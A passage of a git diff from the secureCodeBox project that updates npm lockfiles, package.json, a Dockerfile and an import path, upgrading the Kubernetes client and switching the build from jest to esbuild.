"emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "requires": { - "ansi-regex": "^5.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - } + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" } }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" } }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", "requires": { - "safe-buffer": "^5.0.1" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", "requires": { - "punycode": "^2.1.0" + "b4a": "^1.6.4" } }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } + "undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==" }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" }, "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "requires": {} - }, - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" } } } diff --git a/hook-sdk/nodejs/package.json b/hook-sdk/nodejs/package.json index ae396e3653..dfbb37b832 100644 --- a/hook-sdk/nodejs/package.json +++ b/hook-sdk/nodejs/package.json @@ -3,14 +3,11 @@ "version": "1.0.0", "description": "Handles external communication required for all secureCodeBox Hooks", "main": "hook-wrapper.js", - "scripts": { - "test": "jest" - }, + "scripts": {}, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", - "ws": "^8.13.0" + "@kubernetes/client-node": "^1.3.0" } -} +} \ No newline at end of file diff --git a/hooks/cascading-scans/hook/.dockerignore b/hooks/cascading-scans/hook/.dockerignore index 39bbc11c9b..b0988ef9f2 100644 --- a/hooks/cascading-scans/hook/.dockerignore +++ b/hooks/cascading-scans/hook/.dockerignore @@ -4,3 +4,4 @@ node_modules/ docs/ +build/ diff --git a/hooks/cascading-scans/hook/Dockerfile b/hooks/cascading-scans/hook/Dockerfile index dbb0eff46e..3a1d8d965e 100644 --- a/hooks/cascading-scans/hook/Dockerfile +++ b/hooks/cascading-scans/hook/Dockerfile @@ -21,4 +21,4 @@ RUN npm run build FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ COPY --from=install --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ -COPY --from=build --chown=root:root --chmod=755 /home/app/hook.js /home/app/hook.js.map /home/app/scan-helpers.js /home/app/scan-helpers.js.map /home/app/scope-limiter.js /home/app/scope-limiter.js.map /home/app/kubernetes-label-selector.js /home/app/kubernetes-label-selector.js.map ./ +COPY --from=build --chown=root:root --chmod=755 /home/app/build/ ./ diff --git a/hooks/cascading-scans/hook/hook.ts b/hooks/cascading-scans/hook/hook.ts index 19356fdf40..c183ca06f4 100644 --- a/hooks/cascading-scans/hook/hook.ts +++ b/hooks/cascading-scans/hook/hook.ts @@ -13,7 +13,7 @@ import { isArray, } from "lodash"; import { isMatch as wildcardIsMatch } from "matcher"; -import Mustache from "mustache"; +import Mustache from "mustache/mustache.mjs"; import { startSubsequentSecureCodeBoxScan, diff --git a/hooks/cascading-scans/hook/package-lock.json b/hooks/cascading-scans/hook/package-lock.json index 60129fc535..76fabd0226 100644 --- a/hooks/cascading-scans/hook/package-lock.json +++ b/hooks/cascading-scans/hook/package-lock.json @@ -9,7921 +9,2275 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "ip-address": "^8.1.0", + "@kubernetes/client-node": "^1.3.0", + "ip-address": "^10.0.1", "lodash": "^4.17.21", - "matcher": "^4.0.0", + "matcher": "^5.0.0", "mustache": "^4.2.0", - "parse-domain": "^4.1.0" + "parse-domain": "^8.2.2" }, "devDependencies": { "@types/ip-address": "^7.0.0", - "@types/jest": "^29.4.0", "@types/lodash": "^4.14.171", + "@types/matcher": "^1.1.0", "@types/mustache": "^4.2.6", - "@types/node": "^16.0.0", - "jest": "^29.3.1", - "ts-jest": "^29.0.5", - "typescript": "^4.3.5" + "@types/node": "^22.16.0", + "esbuild": "^0.25.5", + "typescript": "^5.8.3" } }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "node_modules/@esbuild/aix-ppc64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.5.tgz", + "integrity": "sha512-9o3TMmpmftaCMepOdA5k/yDw8SfInyzWWTjYTFCX3kPSDJMROQTb8jg+h9Cnwnmm1vOzvxN7gIfB5V2ewpjtGA==", + "cpu": [ + "ppc64" + ], "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], "engines": { - "node": ">=6.0.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "node_modules/@esbuild/android-arm": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.5.tgz", + "integrity": "sha512-AdJKSPeEHgi7/ZhuIPtcQKr5RQdo6OO2IL87JkianiMYMPbCtot9fxPbrMiBADOWWm3T2si9stAiVsGbTQFkbA==", + "cpu": [ + "arm" + ], "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@esbuild/android-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.5.tgz", + "integrity": "sha512-VGzGhj4lJO+TVGV1v8ntCZWJktV7SGCs3Pn1GRWI1SBFtRALoomm8k5E9Pmwg3HOAal2VDc2F9+PM/rEY6oIDg==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@esbuild/android-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.5.tgz", + "integrity": "sha512-D2GyJT1kjvO//drbRT3Hib9XPwQeWd9vZoBJn+bu/lVsOZ13cqNdDeqIF/xQ5/VmWvMduP6AmXvylO/PIc2isw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@esbuild/darwin-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.5.tgz", + "integrity": "sha512-GtaBgammVvdF7aPIgH2jxMDdivezgFu6iKpmT+48+F8Hhg5J/sfnDieg0aeG/jfSvkYQU2/pceFPDKlqZzwnfQ==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "color-name": "1.1.3" + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@esbuild/darwin-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.5.tgz", + "integrity": "sha512-1iT4FVL0dJ76/q1wd7XDsXrSW+oLoquptvh4CLR4kITDtqi2e/xwXwdCVH8hVHU43wgJdsq7Gxuzcs6Iq/7bxQ==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], "engines": { - "node": ">=0.8.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.5.tgz", + "integrity": "sha512-nk4tGP3JThz4La38Uy/gzyXtpkPW8zSAmoUhK9xKKXdBCzKODMc2adkB2+8om9BDYugz+uGV7sLmpTYzvmz6Sw==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@esbuild/freebsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.5.tgz", + "integrity": "sha512-PrikaNjiXdR2laW6OIjlbeuCPrPaAl0IwPIaRv+SMV8CiM8i2LqVUHFC1+8eORgWyY7yhQY+2U2fA55mBzReaw==", + "cpu": [ + "x64" + ], "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", + "node_modules/@esbuild/linux-arm": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.5.tgz", + "integrity": "sha512-cPzojwW2okgh7ZlRpcBEtsX7WBuqbLrNXqLU89GxWbNt6uIg78ET82qifUy3W6OVww6ZWobWub5oqZOVtwolfw==", + "cpu": [ + "arm" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", + "node_modules/@esbuild/linux-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.5.tgz", + "integrity": "sha512-Z9kfb1v6ZlGbWj8EJk9T6czVEjjq2ntSYLY2cw6pAZl4oKtfgQuS4HOq41M/BcoLPzrUbNd+R4BXFyH//nHxVg==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": ">=18" } }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", + "node_modules/@esbuild/linux-ia32": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.5.tgz", + "integrity": "sha512-sQ7l00M8bSv36GLV95BVAdhJ2QsIbCuCjh/uYrWiMQSUuV+LpXwIqhgJDcvMTj+VsQmqAHL2yYaasENvJ7CDKA==", + "cpu": [ + "ia32" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", + "node_modules/@esbuild/linux-loong64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.5.tgz", + "integrity": "sha512-0ur7ae16hDUC4OL5iEnDb0tZHDxYmuQyhKhsPBV8f99f6Z9KQM02g33f93rNH5A30agMS46u2HP6qTdEt6Q1kg==", + "cpu": [ + "loong64" + ], "dev": true, - "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "node": ">=18" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@esbuild/linux-mips64el": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.5.tgz", + "integrity": "sha512-kB/66P1OsHO5zLz0i6X0RxlQ+3cu0mkxS3TKFvkb5lin6uwZ/ttOkP3Z8lfR9mJOBk14ZwZ9182SIIWFGNmqmg==", + "cpu": [ + "mips64el" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@esbuild/linux-ppc64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.5.tgz", + "integrity": "sha512-UZCmJ7r9X2fe2D6jBmkLBMQetXPXIsZjQJCjgwpVDz+YMcS6oFR27alkgGv3Oqkv07bxdvw7fyB71/olceJhkQ==", + "cpu": [ + "ppc64" + ], "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - 